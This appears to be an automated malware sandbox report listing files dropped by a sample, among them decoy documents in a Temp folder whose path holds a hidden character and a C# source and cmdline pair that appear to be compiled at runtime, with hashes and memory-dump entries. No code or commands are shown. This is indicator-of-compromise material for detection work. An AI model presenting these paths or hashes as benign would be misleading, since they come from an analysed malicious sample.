C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Desktop\RequestConfirm.jpeg

Filesize
195KB

MD5
af4f5c8e72359b4599b7e8e446a5f04c

SHA1
88ed1ea6eb67cd497827213678b18410c9b6ea33

SHA256
0456a5374cb4deff67c42aa8937dec607dea912c74a5ec2ca3cbe36afd93dd1f

SHA512
37992fcd0904e56f2472c7e84642c619b969ce39ed2bd97d5875aee7f24e3fce5054dcb6d2fc6e27cd98bbcc7cbf103d1ca75f62d4c3b9ac37f25012e0169321

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Desktop\SkipUse.docx

Filesize
19KB

MD5
0101a03f8e24610fb3aeb129149201fd

SHA1
e2deb0e5035b029dd75f8c62025e1276e8bf8e51

SHA256
b49fa5e6845feac5d816dcd66880ac9cca07c1294b7e018da519e261e1ee5ee8

SHA512
6415f360d9a62b55e3883ac4e5509d9f7c175e78ade57ddb3cc44b6ff2cb1b7e7d299ee9dc67f794c19558d427a7a95c77f44168e47a7f2c2a64c14e1f5b3dc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Desktop\StartSplit.docx

Filesize
19KB

MD5
50f41a20d8a7fd7729c55affdcc411e1

SHA1
501c1037c43ef9fe839127e3168884a5ff602e65

SHA256
94540b2a06270f7c085799729cf1d7c8998cbffa0bbb8da3b6f594c5b8346ccc

SHA512
0f639351bf2fa57c031ed1e3131b9758c37288c1681c9732b3e7b0ace72aca14573be5316302aa6d8dace4db186d51dca388b5352621f275061155012fef9ffb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Desktop\UpdateResize.xlsx

Filesize
10KB

MD5
86165221e6e30888c89ec243075d0565

SHA1
d92fd366fece286ffd1414d2005ce900fbad7b9e

SHA256
a7bfe15b0e0f86120defff28bc72b21ce705c7f1f841ea562502f124a2ef5370

SHA512
165d2a60b0811dd0c3732b071699245161932c8fe66d6e2a5e8a6a4ffdbb882f6026be82f8b793fdfaae9442cc5b3767f4096427001c025a424d639ce78e6e62

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\ExportEnable.xlsx

Filesize
11KB

MD5
b539f06dcc7b76af42775b7bc14ce4e1

SHA1
5fab5fc371c7f48a2682fe0553ed12c90f9e527a

SHA256
ab546304963ebeff49146f4741c0fe8a402c9f2d3e2d4cbdd4fe833614ecf93e

SHA512
738cef29326d58c898580512e5bbfcc3015441be038edf035b3c072614fd1537534f34e68dff17ae4adfd3cc991cd6f0a12cb7fba44e940d18236aa91e24c2f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\LimitBackup.docx

Filesize
12KB

MD5
0ae17dc533903562e64f2c8bd300f639

SHA1
15079cfe44533759df53ecbd20aa186651c0a4b3

SHA256
5765d2cc8ab84fa64d0614eab09f1718f0f795862706cb1a91cd53dd0fffe394

SHA512
8ac9cd7be0b1aeb5755a73728a4d01193a328b06896336e72c223bf7f777e3fee53d7cbaefb333c2c1211a73961c1d80fd9170095e20ea6da5d1f60c981e6aaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\MoveBackup.vstm

Filesize
255KB

MD5
8c87ad3dddcebf02444e604259adecc5

SHA1
e571bf92ca942e92db49c66adcf8e2aad811ddac

SHA256
ce3091189ca25a0c89f0ea4092b91630c540e5ef4c0fc051187316dfd08f485a

SHA512
90ca974f38d566e4f853e4988992b0e03c600ff3017ffe7960dc9e11848fc53075170af3bb40f50a9d65c2e2a4b287ba7bb2c8bea15dd2131a8e6e22a2c606fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\OpenSubmit.docx

Filesize
175KB

MD5
2402cb4cfe2a54b0e68f3e8adcfaa95b

SHA1
938f365fa22f6a02838b239f1abbea69008cd22b

SHA256
41cb3452fd28eab63058c85e55d7d1c7848368db71437bfed90c774eeb81887d

SHA512
78280bb7d1a6d24c179f9bd935ae8cbd7eb9c9ed6804346852dad926fece5b922ce170b9ab294021a01e4173051c2f4e99c726c428fda1c1dc3485a498e2ca29

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\OptimizeAdd.xls

Filesize
386KB

MD5
f1e3746ca97541b1a44cbc53cad41baa

SHA1
0c0a05316139861b5fdaa4373e2c768ab8b6f605

SHA256
079fd9ca7375d4267bfbfb4d80150d0c6d80fc51cd60319d2c2d9eb288598ddb

SHA512
b6ba3b558928afaca578e90a49444fb56b6bfd736c6d6a70bead25a32f9172f792aa67d58ad84890998fec5e66437d061f5074e17717c02f80deeddd8c7bb372

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\RequestSave.xlsx

Filesize
13KB

MD5
3f3a54119f22313ad6f0f557b2f57154

SHA1
a349a701da53c8f532163aed9086a79a92f4868c

SHA256
53c32dd7fbcc9d97028cd1d2f4cb58d9226fb989ca6eff63e9073ee1e0fdcbe0

SHA512
58198b5677e4f8c5ab81e9f554a0c8d02191b106d8c6268aaa7cfbe555a44cab73012febcfe64a4d84ab2ed2ebe7b51e6e44291fd45a165be0d58a61a19ff8d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\SaveSearch.pdf

Filesize
245KB

MD5
3793452b8fffad63d8f92ee0d5e88307

SHA1
640bc87bee630396a2fb38512a22d8485b47bd5d

SHA256
b2c7f39ac6928b5c89f1bd643b1eccbd431d9b5a783d3f398cbdcb765142c684

SHA512
b5923ce7730d1023a6b4cd8c2626c9007f5a79a4b2a5f87544ccf95765a2211abe9f506306e26e69d44b3ed1683e88d7ce5782abbea7975d2e103436fc4c408f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\SearchSelect.csv

Filesize
436KB

MD5
31a564179d0308ec55c643bc9e56faad

SHA1
53993d26535350a1f53d968025680a30cd7a6fa1

SHA256
bc9e6fdcc8c862a57bb481c11a616dd0fbe3d6900ed94910e85fd8b0fe6a15df

SHA512
ea967b832d10787d286122cede5974ee9f77a26bf2f9f4422d1e1e60b7e3acde0ba049f51916b0bf72899c87f842145ff753eb3aeb8830a8c1e9214f1618df55

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\ShowFormat.xls

Filesize
305KB

MD5
727ee3b8b0ccd4118e32145c5052fcf2

SHA1
eab17882b081d075c02a3a210e88115ca225ce19

SHA256
9b1355d93fceab88b55ed4fb6aba1228144355ce394cd1fb7d977bac02f940b4

SHA512
67fff80dd068e637f32a110d5ec3e23661d7e6be6f774060845aaa889c4cf8d5a41035321d0aa56ad5917a5a6c2c8b0085ad4edf7e02dd22d6bf6e2c1a780512

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ \Common Files\Documents\StopClose.xlsx

Filesize
14KB

MD5
1e382fc24c12b3fe253c7fcb6373b784

SHA1
29627b8a4d5672555737b118c527416bc1751765

SHA256
f8db800b57af706be695ea8f27b0cfa0833ff5a0d0b284676891b170a4794e38

SHA512
70b35777db33d9bc17de8eb787c041e94d08f700314b1fd35abadf28b67cab8f9655453c41f765e0b76f245534586c9ffd12130460d809b69e7a018d82f71418

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\itznjivd\CSCA0E0B78370DF48C6942F153C9C666A7.TMP

Filesize
652B

MD5
cba8e1411b5afeac7ef2160ef68b8999

SHA1
a767fc220b961270e788a095a8d55d7c8bf9d667

SHA256
a7b997f92ed9a05165c342217c821c13fa6e12bbc8b3a8362e52849ae242a20a

SHA512
bdb9953af32d5c606ed78069b8cc68a362adcfe4ee190eb3592356df4246e515401f2c9216f468223d5a1ddb8fbf6be956a15c47bb0c6da55abffd8246e4a9b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\itznjivd\itznjivd.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\itznjivd\itznjivd.cmdline

Filesize
607B

MD5
14de3b1ac20e5ba456154d717e1bc9e0

SHA1
75815025595021b728f2ae6beeb600ce0c18c2c8

SHA256
d292191f7cd707d74ef95d562beed7d8c38633878b8987d902e9a08e6505d802

SHA512
ed4c526d9f5cc955ce2219f2da0b837f006af928577fb9d041806706a44e2496575148cb98a2965fb59f24a746cbf9f1dc76ce911745d161b785eebfed2c0281

Download Submit
memory/2260-149-0x00000269EEB30000-0x00000269EEB52000-memory.dmp

Filesize
136KB

Download
memory/4912-191-0x0000022EEBCA0000-0x0000022EEBCA8000-memory.dmp

Filesize
32KB

Download
memory/4976-291-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp

Filesize
5.9MB

Download
memory/4976-302-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp

Filesize
3.5MB

Download
memory/4976-301-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp

Filesize
736KB

Download
memory/4976-25-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp

Filesize
5.9MB

Download
memory/4976-58-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp

Filesize
140KB

Download
memory/4976-63-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp

Filesize
100KB

Download
memory/4976-44-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp

Filesize
140KB

Download
memory/4976-54-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp

Filesize
180KB

Download
memory/4976-60-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp

Filesize
1.5MB

Download
memory/4976-72-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp

Filesize
3.5MB

Download
memory/4976-73-0x0000014C52CF0000-0x0000014C53068000-memory.dmp

Filesize
3.5MB

Download
memory/4976-76-0x00007FFE7A640000-0x00007FFE7A654000-memory.dmp

Filesize
80KB

Download
memory/4976-77-0x00007FFE7A630000-0x00007FFE7A63D000-memory.dmp

Filesize
52KB

Download
memory/4976-79-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp

Filesize
140KB

Download
memory/4976-80-0x00007FFE6A130000-0x00007FFE6A24C000-memory.dmp

Filesize
1.1MB

Download
memory/4976-70-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp

Filesize
5.9MB

Download
memory/4976-71-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp

Filesize
736KB

Download
memory/4976-66-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp

Filesize
184KB

Download
memory/4976-64-0x00007FFE7A740000-0x00007FFE7A74D000-memory.dmp

Filesize
52KB

Download
memory/4976-56-0x00007FFE7B8E0000-0x00007FFE7B8F9000-memory.dmp

Filesize
100KB

Download
memory/4976-45-0x00007FFE808D0000-0x00007FFE808DF000-memory.dmp

Filesize
60KB

Download
memory/4976-306-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp

Filesize
140KB

Download
memory/4976-222-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp

Filesize
180KB

Download
memory/4976-300-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp

Filesize
184KB

Download
memory/4976-298-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp

Filesize
100KB

Download
memory/4976-297-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp

Filesize
1.5MB

Download
memory/4976-292-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp

Filesize
140KB

Download
memory/4976-333-0x00007FFE7B900000-0x00007FFE7B923000-memory.dmp

Filesize
140KB

Download
memory/4976-339-0x00007FFE7B6F0000-0x00007FFE7B709000-memory.dmp

Filesize
100KB

Download
memory/4976-338-0x00007FFE6A5D0000-0x00007FFE6A747000-memory.dmp

Filesize
1.5MB

Download
memory/4976-337-0x00007FFE7A750000-0x00007FFE7A773000-memory.dmp

Filesize
140KB

Download
memory/4976-336-0x00007FFE7B8E0000-0x00007FFE7B8F9000-memory.dmp

Filesize
100KB

Download
memory/4976-335-0x00007FFE7AC20000-0x00007FFE7AC4D000-memory.dmp

Filesize
180KB

Download
memory/4976-334-0x00007FFE808D0000-0x00007FFE808DF000-memory.dmp

Filesize
60KB

Download
memory/4976-330-0x00007FFE7A630000-0x00007FFE7A63D000-memory.dmp

Filesize
52KB

Download
memory/4976-329-0x00007FFE7A640000-0x00007FFE7A654000-memory.dmp

Filesize
80KB

Download
memory/4976-328-0x00007FFE6A250000-0x00007FFE6A5C8000-memory.dmp

Filesize
3.5MB

Download
memory/4976-327-0x00007FFE79FA0000-0x00007FFE7A058000-memory.dmp

Filesize
736KB

Download
memory/4976-326-0x00007FFE7A660000-0x00007FFE7A68E000-memory.dmp

Filesize
184KB

Download
memory/4976-317-0x00007FFE6AAB0000-0x00007FFE6B099000-memory.dmp

Filesize
5.9MB

Download
memory/4976-332-0x00007FFE7A740000-0x00007FFE7A74D000-memory.dmp

Filesize
52KB

Download
memory/4976-331-0x00007FFE6A130000-0x00007FFE6A24C000-memory.dmp

Filesize
1.1MB

Download